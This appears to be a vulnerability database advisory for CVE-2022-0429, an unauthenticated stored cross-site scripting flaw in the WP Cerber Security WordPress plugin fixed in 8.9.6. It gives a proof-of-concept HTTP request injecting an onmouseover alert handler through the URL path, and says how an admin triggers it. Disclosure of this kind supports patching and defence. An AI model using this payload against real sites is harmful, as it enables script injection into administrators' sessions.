WP Cerber Security, Anti-spam & Malware Scan < 8.9.6 – Unauthenticated Stored Cross-Site Scripting | CVE 2022-0429 | Plugin Vulnerabilities

Description

The plugin does not sanitise the $url variable before using it in an attribute in the Activity tab in the plugins dashboard, leading to an unauthenticated stored Cross-Site Scripting vulnerability.

Proof of Concept

POST /"/onmouseover=alert(1);// HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

a[b][c][d][e][f][g][h][i][j][k][l][m][n][o][p][q][r][s][t][u][v][w][x][y][z][1][2][3][4][5][6]=12345

Then the admin needs to browse to http://127.0.0.1:8001/wp-admin/admin.php?page=cerber-security&tab=activity and move mouse over the link.

Affects Plugins

Fixed in 8.9.6

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

d1b6f438-f737-4b18-89cf-161238a7421b

Timeline

Publicly Published

2022-02-14 (about 3 years ago)

Added

2022-02-14 (about 3 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2023-10-27

Title

Popup Box < 3.7.9 - Admin+ Stored XSS

Published

2024-08-29

Title

Elementor Addon Elements < 1.13.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via id and eae_slider_animation Parameters

Published

2025-01-14

Title

Zarinpal Paid Download <= 2.3 - Reflected Cross-Site Scripting

Published

2025-01-24

Title

Sensly Online Presence <= 0.6 - Admin+ Stored XSS

Published

2024-05-22

Title

ProfilePress < 4.15.9 - Contributor+ Stored XSS